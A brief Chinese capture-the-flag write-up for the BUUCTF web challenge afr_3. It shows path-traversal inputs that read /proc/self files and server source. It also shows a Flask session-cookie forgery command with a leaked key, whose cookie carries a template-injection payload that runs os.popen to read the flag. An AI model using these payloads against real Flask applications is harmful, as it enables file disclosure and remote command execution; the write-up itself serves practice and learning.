(一)BUUCTF web afr_3 考察linux中/proc/目录的理解,以及flash模板注入
(1)name=../../../../../proc/self/cmdline
(2)name=../../../../../proc/self/cwd/server.py (最后的py文件可以改变)
(二)BUUCTF afr_3 使用的是文件路径穿越漏洞,可以通过以上两行代码,查询到flag文件,
使用python3 ./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{
{''.class.mro[2].subclasses()[71].init.globals['os'].popen('cat flag.py').read()}}'}" 进行伪造。
这个命令看起来是在使用 Flask Session Cookie Manager 工具来对会话数据进行编码。具体来说,它执行了以下操作:
1、使用 flask_session_cookie_manager3.py 脚本。
2、使用 encode 子命令表示要对会话数据进行编码。
3、使用 -s 选项指定会话密钥,这里是 "Drmhze6EPcv0fN_81Bj-nA"